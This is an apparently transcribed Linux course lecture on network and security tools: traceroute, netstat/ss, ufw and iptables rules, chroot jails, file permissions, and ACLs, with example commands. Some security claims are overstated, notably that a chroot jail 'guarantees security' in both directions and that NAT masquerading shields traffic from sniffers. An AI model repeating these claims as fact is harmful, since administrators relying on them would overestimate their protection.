If you want to cap the number of hops the trace will attempt, use the -m option, for max, and give it the number of hops to try before giving up on reaching google.com. You can also set the size of the probe packets: the slide presents this as a flag, but on the standard Linux traceroute the packet length in bytes is actually given as a trailing argument after the destination (the -p flag there sets the destination port instead). So -m dictates the maximum number of hops, and the trailing length dictates the size of each packet.

In summary, the traceroute command is a powerful tool for diagnosing network connectivity issues by identifying the path that packets take to reach a destination. It helps pinpoint where the delays or failures are along the route by looking at the actual timestamps and at which packets were discarded, and that makes it very valuable for troubleshooting your network connections: you can see how many packets were dropped, what was taking the longest to reach a location, and the specific routers responsible for the connection drops or the delays.
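A hedged sketch using the standard Linux traceroute syntax (the 20-hop cap and 100-byte length are example values):

```bash
# Trace the route to google.com
traceroute google.com

# Try at most 20 hops before giving up (-m = max TTL)
traceroute -m 20 google.com

# Send 100-byte probe packets (length is a trailing argument)
traceroute google.com 100
```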
netstat, short for network statistics, is another command line tool that displays network-related information: the actual connections you have, the routing tables, interface statistics, masquerade connections (a really fun word), and multicast memberships. It is used very regularly for monitoring and troubleshooting network issues, and the basic usage is to run it with a variety of flags. To view the active listening ports using netstat, you run it with the flags -tuln: t means TCP ports and connections, u means UDP ports and connections, l restricts it to ports in listening mode, and n means numerical addresses instead of hostnames, so you get IP addresses rather than names. If you passed only t it would show only TCP connections, only u would show only UDP, and if you did not include l it would show sockets whether listening or not. So -tuln is essentially asking for all TCP and UDP connections in listening mode, with the IP addresses shown for those particular connections.

In the example output you have the protocol column (tcp, tcp6, udp, udp6, so whether it is TCP or UDP), the receive and send queues, the local addresses assigned to them along with the ports assigned to them (port 80 is the HTTP web server and port 22 is the secure shell server; the two UDP ports in the example I have not memorized a service for), then the foreign addresses, if any, and the state they are in. The TCP ports on our local addresses are in LISTEN state; the UDP ports show no listen state, since UDP is connectionless.

ss is the socket statistics tool, the modern alternative to netstat. It provides essentially similar information and functionality, but supposedly with better performance and more detailed output. It is also part of the iproute2 suite, like the ip command we dealt with earlier, and it is preferred on a lot of Linux distributions. You run it the same way: instead of netstat, you type ss and give it the flags you want, exactly as before, so ss -tuln gives the TCP and UDP listening ports with numeric addresses. The output is similar to what you saw previously, except the state (LISTEN, UNCONN, and so on) that was previously at the very end of each line is now at the very beginning. It also shows the send and receive queues, the local addresses and ports that are connected or listening, and the peer addresses and ports on the other side. That is the example output for the ss command, the socket statistics command. There are some additional options here too: you can look at established connections, showing only active established TCP connections, or at all TCP connections, both listening and established.
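The equivalent commands side by side as a sketch; the -p process flag shown last is broken down in the next paragraph:

```bash
# Listening TCP/UDP sockets with numeric addresses
netstat -tuln
ss -tuln

# All TCP sockets, both listening and established (-a = all)
ss -ta

# Same listening view plus owning process ID and program name
sudo ss -tulnp
```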
Again, you can pass flags singly or combine them. You can also pull in process information: -tulnp means TCP and UDP, deny name resolution so I just see the IP addresses, listening sockets, and p for the process ID and program name. So you get everything we had before, plus, by adding that one last flag, the process that owns or is running each connection.

In summary, netstat and ss are both very powerful tools for monitoring and troubleshooting our network connections, and they give you a lot of great detail: whether something is connected or listening, the IP addresses involved, and so on. netstat is technically the older and very well-known one, ss is the modern version, but they offer essentially the same information you are looking for. I did like the output of ss a little better, since it seemed a little friendlier to the eye, but for the most part they give you the same information you would need.

And finally we have arrived at the conclusion of our network fundamentals: firewall settings. ufw, the Uncomplicated Firewall, is the most common and about the simplest firewall management tool there can be for the command line. It is straightforward, it creates and manages iptables firewall rules underneath, and it is particularly popular on Ubuntu and all of its derivatives because it is simple and very easy to use.

Here are some examples. If you want to enable the firewall, you just run sudo ufw enable. That activates the firewall and enforces any and all of the rules you have configured for it; once enabled, it starts running and filters any incoming or outgoing traffic based on whatever rules have been set up. To disable it, you do the same thing with sudo ufw disable: it deactivates the firewall, and traffic you were previously filtering is no longer filtered.

If you want to allow a service: sudo ufw allow ssh allows traffic for that specific service, SSH, which in this particular case is port 22. SSH stands for Secure Shell, and it allows somebody to connect remotely to the particular device that ufw is running on. Denying works via the port number as well as the service name: sudo ufw deny 80 blocks HTTP traffic on port 80, preventing access to web services running on that particular port.

Then there is the status of the firewall. If you want to see its current status, whether it is actually running and what all the active rules are, any deny rules, any allow rules, you just run the simple sudo ufw status command. It also shows you which of the rules you just applied took effect: if you added deny 80 or deny ssh, running status is how you check that those rules are actually active and currently running.
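The basic ufw commands from this walkthrough, as one sketch:

```bash
# Turn the firewall on or off
sudo ufw enable
sudo ufw disable

# Allow a service by name (SSH = port 22)
sudo ufw allow ssh

# Deny a port by number (HTTP = port 80)
sudo ufw deny 80

# Show whether ufw is active and list the current rules
sudo ufw status
```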
You can also allow by port number, similar to what we did with the service name: sudo ufw allow 443/tcp, where 443 is HTTPS. Port 80 is HTTP, and HTTPS is just the secure version, meaning it carries TLS (or the older SSL) so that all the communication with your browser is actually encrypted, and it is a TCP port, so this allows all TCP traffic on port 443, which is typically for communications with browsers over secure web connections. UDP traffic is often used for things like viewing video: if you do not allow UDP, or if you actually deny 443/udp, you may break some video viewing in the browser (modern QUIC/HTTP3 traffic also rides UDP on port 443). In this particular case we are allowing port 443, secure web connections, over the TCP protocol associated with them.

If you wanted to deny UDP traffic on port 25, which is used for SMTP, the Simple Mail Transfer Protocol, typically used for mail, you do it with a simple deny command: sudo ufw deny 25/udp. That denies all UDP traffic on that port, the emailing port typically used on a network.

Then you can delete rules. If you previously ran sudo ufw allow ssh and now want to remove that rule, you just say sudo ufw delete allow ssh. It is very simple, very intuitive; the syntax is actually quite easy to use. Deleting a deny rule works in a very similar way: if we denied port 80 traffic, we just say sudo ufw delete deny 80, and having deleted that rule, port 80 traffic is now allowed through again.

And then there is logging. If you want to enable logging of what the firewall is doing, and I highly recommend that you log everything that happens with your firewall, you run sudo ufw logging on, and it logs all of the firewall events that are happening. I cannot imagine running a firewall without actually collecting firewall logs. It is very important to have logs of the traffic coming through: if people keep trying to access your port 22, your Secure Shell port, after you have denied access to it, or if you have allowed port 22 traffic but somebody keeps trying to log in with the incorrect password, so that you appear to be the victim of a brute-force attack against your port 22, which is for remote connections and remote control, the logs are how you find out. So turn logging on; and of course you can disable it again by just running sudo ufw logging off.
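Gathered as a sketch:

```bash
# Allow HTTPS over TCP; deny SMTP over UDP
sudo ufw allow 443/tcp
sudo ufw deny 25/udp

# Remove previously added rules
sudo ufw delete allow ssh
sudo ufw delete deny 80

# Turn firewall event logging on or off
sudo ufw logging on
sudo ufw logging off
```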
Now, there is also an all-encompassing, blanket kind of rule: the default policy. Allowing all incoming traffic means anybody at all could try to communicate with your particular computer on any port you have open, which includes your port 22, your DNS service, and all of the other roughly 65,000 available ports. (The syntax is not literally "allow all incoming"; it is a default policy, sudo ufw default allow incoming.) To deny all incoming traffic you do the same thing, just using deny instead of allow, and unsolicited connections to your particular device are rejected. One correction to the caution given here: because ufw is stateful, a default deny incoming policy does not cut you off from the internet; the responses to connections you initiate, fetching pages from Google or YouTube over ports 80 and 443 for example, are tracked and still let through. What it blocks is new inbound connections you did not ask for. The sensible pattern is exactly the one described: deny everything incoming by default, then go and allow the specific ports whose services you want reachable, dedicate the port 80 allowance and the port 443 allowance, say, and deny everybody else.

In the same way you deny or allow all incoming traffic, you can allow all outgoing traffic, so any request you make out to the world is permitted, or deny all of the outgoing requests. Denying outbound traffic suits situations where people should not be able to connect to the internet from that machine at all, because all they need to do is work on the local computer; schools sometimes do this because they want a computer used only for schoolwork. That policy denies all outgoing traffic coming from that particular computer.

In summary, ufw is a very simplified process for managing firewall rules for traffic, with very intuitive commands, as we just saw: enable and disable, allow and deny. And you can work either by service name, like SSH, or by port number, like port 22, which is the same port SSH uses; you could allow port 22, allow port 443, and so forth.

iptables is another command line firewall utility. It allows admins to configure network packet filtering, address translation, and a lot more: it is the more complex counterpart of the Uncomplicated Firewall we just went through, and it operates with the Linux kernel to provide detailed control over how packets are routed. The core tables in iptables: first is filter, one of the main ones, which filters packets. You handle all incoming packets with the INPUT chain, packets routed through your device with the FORWARD chain, and all outgoing packets with the OUTPUT chain; those three chains live in the filter table. Then there is nat, network address translation, which is for masquerading and port forwarding: it does not show your actual IP address, it presents a different one so the world does not see your real address, which is very useful for masquerading, essentially disguising your IP address. Its chains are PREROUTING, altering packets before they are actually routed; POSTROUTING, altering packets after they are routed; and OUTPUT, altering packets generated by your device itself and being sent out to the world.
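The deny-by-default-then-allow pattern just described, sketched with ufw's default policy syntax:

```bash
# Default policies: what happens when no explicit rule matches
sudo ufw default deny incoming
sudo ufw default allow outgoing

# Then punch holes only for what should be reachable from outside
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
```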
What NAT masquerading does, in effect, is change the source IP address on traffic as it is sent out to the world, swapping in the masqueraded, disguised address, so that if your traffic is ever intercepted or sniffed by somebody, they do not see your actual source IP address; they see some other address that cannot be used to attack you directly. Then you have mangle, which is used for specialized packet alterations, like changing the type of service field or marking packets. Within mangle you can alter incoming packets before they are routed using PREROUTING, alter outgoing packets using the OUTPUT chain, and FORWARD, INPUT, and POSTROUTING are available for other types of modifications as well. That is what mangle does.

If you want to look at the current rules, you run sudo iptables with the capital -L flag. It lists all the current rules for the filter table, showing the rules for the INPUT, FORWARD, and OUTPUT chains. The example output is one of the more shrunken displays on my screen, so hopefully you can see it, or zoom in a little on yours. We have Chain INPUT with policy ACCEPT, Chain FORWARD with policy ACCEPT, and Chain OUTPUT with policy ACCEPT, along with the destinations of any rules, which here accept everything from anywhere to anywhere. This listing does not mean much yet, because there is not much data reflected in these rules: with the exception of that one anywhere-to-anywhere accept line, there really are no rules defined.

The basic commands: to allow traffic, you run sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT. That adds a rule to the INPUT chain that allows TCP traffic on port 22, which is used for SSH. Breaking this one down: -A INPUT appends the rule to the INPUT chain; -p tcp specifies the protocol as the TCP protocol; --dport 22 specifies the destination port as 22, and remember, this is an INPUT rule, so this governs our incoming traffic; and -j ACCEPT jumps to the ACCEPT target, allowing the actual traffic.

If you want to block something, you just use DROP as the rule and everything else stays exactly the same. In this particular case it is done on port 80: again this is INPUT traffic, so it is incoming, on TCP port 80, and the very last piece, the big one, is the actual rule itself, -j DROP, which jumps to the DROP target, blocking the incoming traffic destined for port 80.
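Those two rules as a sketch:

```bash
# Allow incoming SSH (TCP, destination port 22) on the INPUT chain
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

# Block incoming HTTP (TCP, destination port 80)
sudo iptables -A INPUT -p tcp --dport 80 -j DROP
```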
If you want to delete a rule, you use -D, which deletes the rule from the chain: sudo iptables -D INPUT -p tcp --dport 80 -j DROP. This is the same exact rule we just added, the TCP port 80 DROP rule; instead of appending with -A as we did before, we are deleting it from the INPUT chain with -D, and everything else stays exactly the same. The rule was to drop all the traffic to port 80; now we delete that rule so we can allow traffic on port 80 again.

If you want rules to persist, you need to save them to the configuration file stored inside the /etc directory, assuming you have the iptables persistence files set up: /etc/iptables/rules.v4 is the actual configuration file. You take everything you just did and run sudo iptables-save, then redirect it with the > operator; you should remember what that operator does: it sends the command's output to that specific path, the rules.v4 file for iptables. If you want to restore rules that were saved, you go in the other direction: iptables-restore reads from the rules.v4 configuration file with the < operator, the opposite of the save redirection.

If you want to view a specific table, you use -t, which selects the table, for example the nat table, our network address translation table: sudo iptables -t nat -L says, list all of the rules for that particular table.

So iptables is a powerful, flexible tool, obviously a little more complex than what we just saw with ufw. It has rules that work at a low level, providing extensive control over the actual network traffic handling: you can configure rules for filtering packets, translating network addresses, modifying packets, and so on. Those are the features that are expanded beyond ufw: ufw does not protect your IP address by changing it on the way out, which is network address translation, and ufw does not do the mangling that is available in iptables. iptables is a little more complex to work with, but it also has a lot more functionality than ufw does.
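A sketch of the delete, persist, restore, and table-selection commands; the rules.v4 path assumes the Debian-style iptables-persistent layout, and note the shell caveat on the redirection:

```bash
# Remove the DROP rule added earlier (-D deletes instead of appending)
sudo iptables -D INPUT -p tcp --dport 80 -j DROP

# Persist the current rules (a bare > redirection runs as your own user,
# so wrap it in `sudo sh -c` when /etc/iptables is not writable by you)
sudo sh -c 'iptables-save > /etc/iptables/rules.v4'

# Re-apply previously saved rules
sudo sh -c 'iptables-restore < /etc/iptables/rules.v4'

# List the rules of the NAT table specifically (-t selects the table)
sudo iptables -t nat -L
```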
All right, now on to a very important chapter: security and access management. The very first section of this is file system security, and the first portion of file system security is chroot, the concept of the isolated environment, and something called the chroot jail. First, chroot stands for "change root." It is a powerful Unix command, and it changes the root directory for a currently running process and its child processes, so we are talking about a parent process and its children. When you change the root directory, you effectively isolate a subset of the file system, and you create what is known as a chroot jail: an isolated version of that subtree. It ensures that any process running within it cannot access files outside that specific isolated environment, which enhances the security and control of the system as a whole, as well as of the directory or file system that has been isolated. Essentially, you take one specific directory and all of the contents within it and isolate it so it is separate from the rest of the file system hierarchy. From there, you ensure not only that the rest of the file system is protected from what goes on within that isolated environment, but also that everything inside the isolated environment is protected from what goes on outside of it, in the rest of the file system. The isolation component by itself guarantees security for the isolated environment and for everything sitting outside of it, in both directions.

A better way to break this down is to look at the question itself: why would we use this? Because when you isolate an application in a chroot jail, that isolated directory and everything inside it, you limit the damage that any potentially untrusted or compromised program can do, and vice versa, since those untrusted programs cannot see or interact with the broader system. Let me show you a visual of this.

Here is the example, the visual: this is the standard hierarchy, our actual system root along with the binaries, home, the system directories, and so on. Inside home there is one particular user with all of their contents, and what we have done is put all of those contents inside a chroot jail, so to speak; we have imprisoned them. Now everything inside that red box is completely separate from the rest of the system, meaning if this particular user downloaded something they should not have, or clicked a link they should not have, whatever they did in their environment stays isolated from the rest of this environment: our actual root, the binaries, and everything else inside our main system is not affected by what goes on inside the jailed portion. That is really the big significance here. Essentially we have created a sandbox type of environment: anything that happens to this user in their isolated environment will probably affect their own file system, they might lose the contents inside it, and the hacker, whoever got into their file system, may have access to everything inside that isolated area, but they will not be able to leave it and get into the root portion. That is very important, because this user may not have elevated privileges, and if they do something wrong, if somebody exploits this particular user, we do not want that malicious actor to be able to get out of this environment and into the main environment with root privileges, where they could do some serious damage and get access to certain materials
that they otherwise would not have had access to. So that is the visual concept of what it means to create a chroot jail.

There are also other reasons why chroot is actually useful, apart from security. If developers want to create something and test it in a controlled environment before deploying it into production, before deploying it to the rest of the company, so to speak, they can do that safely inside a jailed, imprisoned type of environment: testing applications and any configurations they want, and especially testing software that needs particular dependencies or library versions, upgraded versions, and so on. So it is very useful in the development context as well. And finally, there is accessing and repairing systems from a rescue environment: in incident response, if the main system is unbootable, administrators can use chroot to access and repair those systems from the rescue environment, because something may have happened, a crash or some event they need to recover from, and the goal is to get back to what is known as business as usual. There is a recovery point, and ideally backups are taken frequently enough that the most recent recovery point is close at hand; administrators can then use chroot from the rescue environment, which is essentially a chroot-jailed environment itself, to get into the system and hopefully recover it.

Using the command first requires that you actually create a directory that will serve as the chroot jail. We have already covered how to make a directory; here you would use sudo, because this particular directory is going to live in an elevated-privilege environment so that other people cannot interact with it without sudo access. So you create the directory with sudo mkdir and whatever path you choose; that is what we are going to use as our actual jail environment.

Then you populate that jailed environment by either copying or installing the necessary binaries, libraries, and files into it. You create the environment, which could be something that belongs to a user, as in the visual example, and then you populate the contents of that directory with the libraries, the files, the binaries, everything else that would be necessary for that particular environment to run. The basic population looks like this: copy /bin/bash into the jail directory, then recursively copy everything inside /lib and /lib64, and everything needed from /usr, into the new directory that has been made, the jailed directory, the imprisoned directory (I like saying "imprisoned" for whatever reason). All of the contents of everything that needs to be used in that jailed environment must actually be copied into it. This part is very, very simple: the -r flag makes the copy recursive, meaning it takes everything inside the library directory, all of its subdirectories, and the contents of those directories along into the jailed environment.
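Pulling the workflow together as a hedged sketch: my_chroot is an example jail path, and copying all of /lib wholesale follows the slide's example; on a real system you would usually copy only the libraries bash actually needs (ldd /bin/bash lists them):

```bash
# 1. Create the jail directory and the layout it needs
sudo mkdir -p /my_chroot/bin /my_chroot/lib /my_chroot/lib64

# 2. Populate it with a shell and the libraries it depends on
sudo cp /bin/bash /my_chroot/bin/
sudo cp -r /lib/.   /my_chroot/lib/
sudo cp -r /lib64/. /my_chroot/lib64/

# 3. Change root into the jail and start the copied shell
sudo chroot /my_chroot /bin/bash

# 4. Inside the jail, verify: only bin, lib, and lib64 should appear
ls /
```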
You want the directory structure within the chroot jail to mimic the standard Linux directory layout: the binaries, the system binaries, and whatever else your particular environment would need in a normal layout must also exist inside the jail, because it is being cut off from the rest of the system. Once everything has been transferred in, you use the chroot command to change the root directory for the current process to the specified directory: `sudo chroot` followed by the path to the directory you created. For the remainder of the session you are logged into, that directory acts as the root directory. If you want to run anything, test a development upgrade, or open a file attachment to see whether it behaves properly or is malware, you do it inside this directory to protect the rest of the system, or simply to test without side effects.

The full workflow from beginning to end: create and populate the directory (`mkdir mychroot`, then copy `/bin/bash` into `mychroot/bin` and the `/lib` and `/lib64` trees into the jail), then switch into it with `sudo chroot mychroot`. Once you are inside the chroot environment, confirm that everything is running as it should: run `ls /` to list the contents of the root directory. If you have done everything correctly, you should see only the contents of the new root environment rather than everything you would normally see under /. Since we copied only those pieces, the listing should show just bin, lib, and lib64.
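Putting those steps together, here is a minimal sketch of the workflow, assuming `mychroot` as the jail directory and a distribution that keeps bash's shared libraries under /lib and /lib64 (on a real system you would copy only the specific libraries the jailed binaries actually require):

```bash
# 1. Create the directory that will serve as the chroot jail
sudo mkdir mychroot

# 2. Populate the jail with the binaries and libraries it needs
sudo mkdir -p mychroot/bin
sudo cp /bin/bash mychroot/bin/
sudo cp -r /lib mychroot/
sudo cp -r /lib64 mychroot/

# 3. Change the root directory for the current session to the jail
sudo chroot mychroot /bin/bash

# 4. Inside the jail, list the new root; only the copied
#    contents (bin, lib, lib64) should appear
ls /
```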
Some considerations and best practices to keep in mind. Keep the chroot (jailed) environment as minimal as possible: only the binaries, libraries, and software you actually need, so that the attack surface is reduced. If you copy everything from your normal environment into the jail, you have largely defeated the purpose of creating an isolated environment. The jail is reusable across sessions, but for any given session include only what that exercise requires. Make sure all file permissions within the jail are set correctly to prevent privilege-escalation attempts. And practice escape prevention: if anyone does attack the jailed directory, they should not be able to get out. Avoid running services or granting access to tools that could allow a process to escape the chroot jail, which goes back to the first point: include only the necessary binaries, and do not copy anything into the jail that would hand an attacker an escape route into the rest of your system.

In summary, chroot is a very valuable tool for creating an isolated environment in Linux, essentially a sandbox, which enhances security by restricting programs to a specific part of the file system. It is commonly used for running potentially untrusted applications, for development and testing, and for system recovery. You can turn any new directory into a little sandbox to protect the rest of your system, and it is not only about hacks, either: often you simply want to test a new build or a software upgrade and make sure it does not affect the rest of the system, wipe something, crash the machine, or accidentally delete data.

File Permissions and Ownership

Now we are going to take another look at file permissions and ownership, and this time dive a little deeper into the concept. As you should already know, there are different levels of permissions we can apply and different categories that can have ownership of, or access to, the files and directories that exist on a system. The three categories are the owner (which is a user), the group, and others (any other user on the system).
Each of these categories can hold three permissions: read, write, and execute. Recall the numerical values: read is 4, write is 2, and execute is 1. With all three turned on you have a value of 7; read and write only is 6; read and execute is 5; and so on. These permissions can apply to any of the ownership categories.

First, look at the breakdown of a permission string such as `-rwxr-xr-x`. The very first character indicates the file type: a dash means a regular file, a `d` in its place means the item is a directory, an `l` means a symbolic link, and so on. The next three characters are the owner's permissions; in this example the owner has read, write, and execute. The following three characters are the group's permissions: read, no write, and execute. The final three are for the others category: again read, no write, and execute. Writing represents modification, so in this example the group and others can read the file or execute it (read the binary, run the binary), but they cannot write to or modify it.

Knowing this, we can look at how to change the permissions of something, which we do with chmod (change mode). In the symbolic version, instead of numerical values we use the symbols r, w, and x. For example, `chmod u+rwx,g+rx,o+rx filename` gives the user read, write, and execute, gives the group read and execute, and gives others read and execute. This usually needs sudo in front of it as well, so it would be `sudo chmod` and so on.
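As a concrete sketch of the symbolic form (`filename` is a placeholder, and sudo is only needed if you do not own the file):

```bash
# Owner: read/write/execute; group and others: read/execute
sudo chmod u+rwx,g+rx,o+rx filename

# Verify the result; the permission string should read -rwxr-xr-x
ls -l filename
```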
Then there is the numerical mode of changing permissions, which uses the numbers themselves. The first digit represents the user, the second the group, and the third the others category. As we already established, read, write, and execute together total 7. If a category has only read and execute, read is 4 and execute is 1, which totals 5. So `chmod 755 filename` changes the permissions numerically, and it represents exactly what we did in the symbolic example: u+rwx, g+rx, o+rx turns into 755.

If we wanted to change the ownership of a file, we would do it with the chown (change owner) command: `sudo chown user:group filename`. You replace the two fields with the actual user and the actual group you want to dedicate to the file, for example user `alice` and the `developers` group. That changes the ownership of the file to the entities you have declared, so `sudo chown alice:developers example.txt` assigns ownership of example.txt to Alice and the developers group.

Then there is changing the group alone, with the chgrp (change group) command: you first give the group you want the file changed to, say developers, and then the file name. Again sudo is used to supply administrator-level permissions, because you are changing the group ownership of a file, which should require an administrator's privilege. So `sudo chgrp developers example.txt` assigns group ownership of example.txt to the developers group.

Here is a sample workflow. First the file is created with touch. Then chmod changes its permissions: the owner gets 6, which represents read and write, and everybody else gets 4, which is read only. Running `ls -l` on the file should then show read and write for the owner and a read-only permission for everyone else. If we wanted to change the ownership of the file, we would use the chown command on the same file name, assigning the owner to Alice and the group ownership to the developers group, for the same example.txt file.
Then run `ls -l` again to see the new ownership: in the long listing, the owner's name and then the group's name appear in the columns following the permissions and the link count, so in this example they would read alice and developers. Changing the group works the same way with chgrp, which you have already seen; running `ls -l` afterwards shows that change as well.

In summary, understanding and managing file permissions is very important to system security, because you do not want people who should not have access to a specific file or directory to have access to it. To confirm that you have assigned permissions on certain items only to certain people or groups, you use these options. Some people should have no permissions at all, and you can remove read, write, and execute from a category by using a minus instead of a plus: in the earlier example where we gave the others category `o+rx`, we could just as well do `o-rx` and remove those permissions, and the same goes for the group with `g-rx`. It all depends on your instructions. You may be told that certain groups in the company should not have access to particular files or directories, so you remove everyone's permissions on that directory and all of its contents. Or when a new employee joins and gains access to a group's assets, a subcategory of those assets may be off-limits until they reach a certain level of seniority; until then, you remove their access using the owner, group, or others category with the minus form. Numerically, you change the digits to zeros, and a zero represents no permission: 700 means the group and the others category can neither read, nor write, nor execute that file. So change ownership (chown), change mode (chmod, the permissions), and change group (chgrp) form a very simple but very powerful series of commands, especially when it comes to access control and making sure that the right people, and only the right people, can reach a given asset. A consolidated sketch of this workflow follows below.
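Here is the whole permission-and-ownership workflow in one place, assuming the user `alice` and the group `developers` already exist on the system:

```bash
# Create a file, then set numeric permissions:
# owner 6 (rw-), group 4 (r--), others 4 (r--)
touch example.txt
chmod 644 example.txt
ls -l example.txt    # -rw-r--r-- 1 user group ... example.txt

# Reassign the owner and the group
sudo chown alice:developers example.txt
sudo chgrp developers example.txt    # changes only the group
ls -l example.txt    # -rw-r--r-- 1 alice developers ... example.txt

# Revoke access: '-' removes symbolic permissions, 0 removes all
chmod o-rx example.txt    # others lose read and execute
chmod 700 example.txt     # owner keeps rwx; group and others get nothing
```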
This brings us to access control lists.

Access Control Lists (ACLs)

Access control lists are a way to provide more fine-grained control over file and directory permissions than the standard Unix permissions we just reviewed. With an ACL you can define permissions for multiple users and groups on a single file or directory, allowing specific access levels beyond the traditional owner, group, and others model.

First and foremost, the entries. An ACL is a list in which each entry specifies the permissions for a single user or a single group, and consists of a type (user or group), an identifier (the user name or group name), and the permissions set for it (read, write, or execute). There are several kinds of entries:

• User ACL: specifies permissions for a specific user.
• Group ACL: specifies permissions for a specific group.
• Mask ACL: defines the maximum effective permissions for all entries other than the owner and the others category; whatever an entry grants beyond the mask does not take effect.
• Default ACL: specifies default entries that are set on a directory and inherited by new files and subdirectories created within it. For example, if a directory carries default entries granting read, write, and execute, items created inside it inherit those entries.

The basic command here is setfacl (set file ACL), for example `sudo setfacl -m u:username:rwx filename`. The `u` represents a user, the identifier is the actual user name, and the last field is the permissions being assigned to that user. To be clear, the -m stands for modify (not mask): we are modifying the ACL entries, adding read, write, and execute permissions for the specified user on that file. To view the ACL for a specific file, the counterpart command is getfacl: `getfacl filename` displays the ACL entries for the specified file, showing all of the users and groups along with their defined permissions. Here is the example workflow; note that it uses sudo, since it requires administrator privileges.
We set the ACL on the file by modifying it for the user Alice, who gets read, write, and execute permissions on example.txt: `sudo setfacl -m u:alice:rwx example.txt`. The `u` is separated from the user name by a colon, and the user name and the permission levels are separated by a colon as well. That is how we add a user permission for a given file.

Adding a group permission is exactly the same shape of entry, still setfacl with -m to modify; the only thing that changes is a `g` for group instead of the `u`, followed by the name of the group, developers, which gets read and execute: `sudo setfacl -m g:developers:rx example.txt`. The group cannot write to or modify the file, but its members can read it and execute it. That is how we set permissions for a group.

Then there is setfacl for directories, using the -d option, which operates on the default ACL entries; these live on directories so that newly created contents inherit them. So `sudo setfacl -d -m u:alice:rwx /path/to/directory`: -d for the default entries, -m to modify, the same user as before, and now the path to the directory instead of the name of a file.

To view the access control permissions for all of the groups and users assigned to a particular file, you simply run getfacl with the name of the file. Example output for `getfacl example.txt`: the file name is example.txt, the owner is root, and the group is root; then comes the owning user's entry, an entry giving alice read, write, and execute, the owning group's entry, the developers group with read and execute, the mask at read, write, and execute, and finally the others category with read-only permission on this file.
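A sketch of those commands together (file name, user, and group taken from the example above; the directory path is a placeholder):

```bash
# Give the user alice read/write/execute on the file
sudo setfacl -m u:alice:rwx example.txt

# Give the developers group read/execute
sudo setfacl -m g:developers:rx example.txt

# Set a default entry on a directory so new items inside inherit it
sudo setfacl -d -m u:alice:rwx /path/to/directory

# Display all ACL entries on the file
getfacl example.txt
```

The getfacl output would look roughly like this:

```
# file: example.txt
# owner: root
# group: root
user::rwx
user:alice:rwx
group::r-x
group:developers:r-x
mask::rwx
other::r--
```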
To remove ACL entries you use the -x option. It is still a setfacl command, but now `sudo setfacl -x u:alice example.txt` removes that user from the file's access control list entirely. You do not specify permissions here, because you are removing the whole entry: whatever permissions the user had go with it. The -x option also works for a single group entry: `g:` followed by the group name, say developers, then the file name, removes just that one entry. To remove all of the access control entries on a file, you use the -b option: still setfacl, so `sudo setfacl -b example.txt` clears every single entry on that asset. For a directory you give the directory path instead (and the -d flag, as before, limits an operation to the directory's default entries).

To modify the mask you again use setfacl with -m, but this time the target is the mask itself: `sudo setfacl -m m::rwx example.txt` sets the mask to read, write, and execute for that file. Keep in mind what the mask does: it caps the effective permissions of every named user and group (and the owning group) on the file. An entry's effective permission is the overlap between what the entry grants and what the mask allows, so a generous mask like rwx leaves entries such as alice's rwx or the developers group's r-x fully in effect, while a narrower mask would cut them down; the mask never grants more than an entry itself holds. The sketch below shows the removal and mask commands.
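A short sketch of entry removal and mask modification, again using the example file, user, and group from above:

```bash
# Remove a single user's entry (their permissions go with it)
sudo setfacl -x u:alice example.txt

# Remove a single group's entry
sudo setfacl -x g:developers example.txt

# Remove every extended ACL entry on the file
sudo setfacl -b example.txt

# Set the mask; effective permissions of named users and
# groups can never exceed it
sudo setfacl -m m::rwx example.txt
```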
In summary, the access control list is an advanced method for managing file permissions in Linux, allowing specific access levels for multiple users and groups. The commands setfacl and getfacl let you set and view these fine-grained permissions easily, and you now know the various options: -m modifies entries, -x removes a single user or group from the list, -d targets a directory's default entries, and -b removes every single entry from the list. When adding entries, prefix a user name with `u:` and a group name with `g:`. setfacl and getfacl are the commands we use to set the access control list for any given asset and to see the access control list for that asset.

Firewall Management

Now we need to talk about network security, another very important concept under the security umbrella, and the very first portion of it is management of the firewall. We have already done an intro to ufw, the uncomplicated firewall, as well as iptables, but we are going to review them a little further. You should already know that firewalls are central to network security: they act as a barrier between your internal and external networks, monitoring and controlling incoming and outgoing traffic according to rules that we establish. Both ufw and iptables have rule sets you can use to make sure whatever you are trying to do gets done.

The first tool is ufw, the uncomplicated firewall. It is a very simple firewall, but a very powerful one: it does not require complicated commands or an understanding of a variety of sophisticated binaries, its syntax is easy, and it gets the job done. To activate it you run `sudo ufw enable`; essentially every ufw command that follows is also prefaced with sudo. Once the firewall is enabled, the next thing is allowing or denying traffic. `sudo ufw allow 22` allows incoming traffic on port 22, which is SSH. These plain rules deal only with inbound traffic: any rule for outbound traffic needs the keyword `out`, as in `sudo ufw allow out 22`. Likewise, `sudo ufw deny 80` denies incoming HTTP traffic on port 80, while `sudo ufw deny out 80` denies outgoing HTTP traffic on port 80. To check the status of all the rules you have, run `sudo ufw status`: it shows whether the firewall is active and lists all of the active rules running on it.

A new command we are going through here is allowing traffic from a specific IP address: `sudo ufw allow from <address> to any port 22` allows SSH traffic from that one address on port 22. Combine it with a deny rule on port 22 and you have effectively whitelisted the address: everyone else is refused on port 22, but that particular IP is allowed in. And again, this is inbound traffic, since we did not write `allow out`; the rule covers incoming traffic from that address only. That is how you allow a specific IP address.
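The ufw commands from this section in one place (192.168.1.100 is a hypothetical address standing in for the IP you want to whitelist):

```bash
# Activate the firewall
sudo ufw enable

# Allow incoming SSH; deny incoming HTTP
sudo ufw allow 22
sudo ufw deny 80

# Outbound rules need the 'out' keyword
sudo ufw deny out 80

# Whitelist a single address for SSH
sudo ufw allow from 192.168.1.100 to any port 22

# Show whether the firewall is active and list the rules
sudo ufw status
```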
iptables is the more complex, or let us call it the sophisticated, counterpart of ufw. It allows far more detailed control over the network, letting administrators create complex rules for packet filtering, for network address translation (NAT, which masks your IP address so that outsiders cannot see your actual address: traffic leaving your network is presented under a different IP, and that is what the outside world sees, which is a very powerful capability), for mangling, and so on. It is very useful, but it does require a better understanding of networking concepts.

